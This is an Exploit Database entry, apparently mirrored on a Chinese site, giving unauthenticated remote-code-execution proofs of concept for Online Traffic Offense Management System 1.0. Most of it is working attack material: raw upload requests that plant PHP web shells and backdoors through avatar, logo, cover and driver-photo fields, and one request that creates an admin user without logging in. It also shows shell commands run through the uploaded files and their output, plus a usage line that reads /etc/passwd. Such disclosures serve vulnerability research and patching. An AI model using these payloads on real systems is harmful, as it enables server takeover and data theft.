Online Traffic Offense Management System 1.0 – Multiple RCE (Unauthenticated)

• Exploit Database
• 15 阅读

• 作者： snup
  日期： 2021-10-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50389/

• # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
  # Date: 07/10/2021
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: snup.php@gmail.com
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
  # Version: 1.0
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ### RCE - Remote Code Execution
  
  # All requests can be sent by both an authenticated and a non-authenticated user
  
  # RCE - we can exploit the RCE vulnerability in several ways:
  
  * Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
  
  * System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
  
  * User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
  
  * Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
  
  * Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
  
  -----------------------------------------------------------------------------------------------------------------------
  # POC
  -----------------------------------------------------------------------------------------------------------------------
  
  ## Example 1
  
  # Request send as Unauthenticated user
  
  POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: */*
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
  Content-Length: 1184
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="id"
  
  
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="firstname"
  
  hacked
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="lastname"
  
  hacked
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="username"
  
  hacked
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="password"
  
  hacked
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="type"
  
  1
  -----------------------------210106920639395210803657370685
  Content-Disposition: form-data; name="img"; filename="cmd.php"
  Content-Type: application/octet-stream
  
  <HTML><BODY>
  <FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="x">
  <INPUT TYPE="submit" VALUE="Send">
  </FORM>
  <pre>
  <?php
  if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
  ?>
  </pre>
  </BODY></HTML>
  
  
  
  -----------------------------210106920639395210803657370685--
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 07:59:24 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 1
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  1
  
  -----------------------------------------------------------------------------------------------------------------------
  # The file was uploaded to the uploads directory
  # Request to list files in uploads\
  
  GET /traffic_offense/uploads/ HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 08:06:35 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  Access-Control-Allow-Origin: *
  Content-Length: 2139
  Content-Type: text/html;charset=UTF-8
  
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  <html>
   <head>
  <title>Index of /traffic_offense/uploads</title>
   </head>
   <body>
  <h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="https://www.exploit-db.com/icons/blank.gif" alt="[ICO]"></th><th><a href="https://www.exploit-db.com/exploits/50389/?C=N;O=D">Name</a></th><th><a href="https://www.exploit-db.com/exploits/50389/?C=M;O=A">Last modified</a></th><th><a href="https://www.exploit-db.com/exploits/50389/?C=S;O=A">Size</a></th><th><a href="https://www.exploit-db.com/exploits/50389/?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
  <tr><td valign="top"><img src="https://www.exploit-db.com/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="https://www.exploit-db.com/traffic_offense/">Parent Directory</a> </td><td>&nbsp;</td><td align="right">- </td><td>&nbsp;</td></tr>
  <tr><td valign="top"><img src="https://www.exploit-db.com/icons/image2.gif" alt="[IMG]"></td><td><a href="https://www.exploit-db.com/exploits/50389/1629336240_avatar.jpg">1629336240_avatar.jpg</a></td><td align="right">2021-08-19 09:24</td><td align="right"> 11K</td><td>&nbsp;</td></tr>
  <tr><td valign="top"><img src="https://www.exploit-db.com/icons/image2.gif" alt="[IMG]"></td><td><a href="https://www.exploit-db.com/exploits/50389/1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58</td><td align="right">5.2K</td><td>&nbsp;</td></tr>
  <tr><td valign="top"><img src="https://www.exploit-db.com/icons/image2.gif" alt="[IMG]"></td><td><a href="https://www.exploit-db.com/exploits/50389/1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31</td><td align="right">3.4K</td><td>&nbsp;</td></tr>
  <tr><td valign="top"><img src="https://www.exploit-db.com/icons/text.gif" alt="[TXT]"></td><td><a href="https://www.exploit-db.com/exploits/50389/1633593540_cmd.php">1633593540_cmd.php</a> </td>
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  # Request to webshell
  
  GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  
  -----------------------------------------------------------------------------------------------------------------------
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 08:10:10 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Access-Control-Allow-Origin: *
  Content-Length: 810
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <HTML><BODY>
  <FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Send">
  </FORM>
  <pre>
   Volume in drive C has no label.
   Volume Serial Number is 283C-C6A0
  
   Directory of C:\xampp\htdocs\traffic_offense\uploads
  
  07.10.202110:09<DIR>.
  07.10.202110:09<DIR>..
  19.08.202109:2411ÿ426 1629336240_avatar.jpg
  20.08.202108:58 5ÿ288 1629421080_tl-logo.png
  07.10.202107:31 3ÿ451 1633584660_xss.svg
  07.10.202109:59 252 1633593540_cmd.php
  07.10.202110:02 252 1633593720_cmd.php
  07.10.202109:02<DIR>drivers
   5 File(s) 20ÿ669 bytes
   3 Dir(s)86ÿ494ÿ085ÿ120 bytes free
  </pre>
  </BODY></HTML>
  
  -----------------------------------------------------------------------------------------------------------------------
  
  ## Example 2
  
  # Webshell as System Logo and next webshell as Potal Cover in System Information page
  
  # Request
  
  POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: */*
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
  Content-Length: 3176
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/traffic_offense/admin/?page=system_info
  Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="name"
  
  Online Traffic Offense Management System - PHP
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="short_name"
  
  OTOMS - PHP
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="about_us"
  
  <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
  
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="files"; filename=""
  Content-Type: application/octet-stream
  
  
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="img"; filename="cmd.php"
  Content-Type: application/octet-stream
  
  <HTML><BODY>
  <FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Send">
  </FORM>
  <pre>
  <?php
  if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
  ?>
  </pre>
  </BODY></HTML>
  
  
  
  -----------------------------339921602532596419562348365833
  Content-Disposition: form-data; name="cover"; filename="list.php"
  Content-Type: application/octet-stream
  
  <?php
  
  if($_GET['file']) {
  	$fichero=$_GET['file']; 
  	} else {
  	$fichero="/";
  	} 
  
  if($handle = @opendir($fichero)) {
  while($filename = readdir($handle)) {
  echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
  }
  closedir($handle);
  } else {
  echo "FILE: " . $fichero . "<br><hr><pre>";
  $fp = fopen($fichero, "r");
  $buffer = fread($fp, filesize($fichero));
  echo $buffer;
  fclose($fp);
  }
  
  ?>
  -----------------------------339921602532596419562348365833--
  
  -----------------------------------------------------------------------------------------------------------------------
  
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 08:21:35 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 1
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  1
  
  -----------------------------------------------------------------------------------------------------------------------
  
  # The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php
  
  ## Example 3
  
  # Webshell as photo in driver list page
  
  # Request
  
  POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
  Content-Length: 2148
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
  Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="id"
  
  
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="license_id_no"
  
  vvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="lastname"
  
  vvvvvvvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="firstname"
  
  vvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="middlename"
  
  vvvvvvvvvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="dob"
  
  2021-10-07
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="present_address"
  
  vvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="permanent_address"
  
  vvvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="civil_status"
  
  Single
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="nationality"
  
  vvvvvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="contact"
  
  vvvvvvvv
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="license_type"
  
  Student
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="image_path"
  
  
  -----------------------------12210274961293066124133837204
  Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
  Content-Type: application/octet-stream
  
  <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
  
  <?php
  
  if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
  echo "</pre>";
  die;
  }
  
  ?>
  
  Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
  
  <!--http://michaeldaw.org 2006-->
  
  -----------------------------12210274961293066124133837204--
  
  -----------------------------------------------------------------------------------------------------------------------
  
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 08:35:21 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Access-Control-Allow-Origin: *
  Content-Length: 20
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  {"status":"success"}
  
  -----------------------------------------------------------------------------------------------------------------------
  
  # Request to webshell
  
  GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  
  -----------------------------------------------------------------------------------------------------------------------
  
  # Response
  
  HTTP/1.1 200 OK
  Date: Thu, 07 Oct 2021 08:39:15 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  X-Powered-By: PHP/7.4.23
  Access-Control-Allow-Origin: *
  Content-Length: 95
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
  
  <pre>desktop-uhrf0c6\hubert
  </pre>